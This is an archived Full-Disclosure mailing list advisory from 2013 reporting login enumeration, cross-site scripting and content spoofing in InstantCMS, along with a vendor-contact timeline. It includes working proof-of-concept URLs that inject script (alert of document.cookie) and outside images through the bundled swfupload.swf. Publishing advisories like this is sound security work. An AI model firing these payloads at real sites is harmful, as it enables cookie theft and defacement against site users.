[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Multiple vulnerabilities in InstantCMS
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Multiple vulnerabilities in InstantCMS
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Wed, 25 Sep 2013 21:13:45 +0300
Hello 3APA3A!
These are Login Enumeration, Cross-Site Scripting and Content Spoofing
vulnerabilities in InstantCMS.
-------------------------
Affected products:
-------------------------
Vulnerable are InstantCMS 1.10.2 and previous versions.
-------------------------
Affected vendors:
-------------------------
InstantSoft
http://www.instantcms.ru
----------
Details:
----------
Login Enumeration (WASC-42):
http://site/users/login
It's possible to reveal logins by users' profiles. And also logins of the users
are shown in many sections of the site (at users page and others), because
developers don't care about leakage of logins of the users. In the next
advisory about InstantCMS I'll give more example of such vulnerabilities.
Cross-Site Scripting (WASC-08):
http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Content Spoofing (WASC-12):
http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif
------------
Timeline:
------------
In November 2012 and March 2013 I disclosed and wrote to the lists about
vulnerabilities in SWFUpload. All who want fixed these holes, but not
developers of InstantCMS.
2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.19 - informed developers about first part of the vulnerabilities.
Ignored.
2013.07.30 - announced at my site.
2013.07.31 - informed developers about another part of the vulnerabilities.
Answered, but refused to fix.
2013.08.02 - reminded developers about first letter with holes and explained
why to fix them.
2013.08.02 - developers released InstantCMS 1.10.2 without fixing any informed
vulnerabilities. All above-mentioned holes work in it.
2013.09.24 - disclosed at my site (http://websecurity.com.ua/6681/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/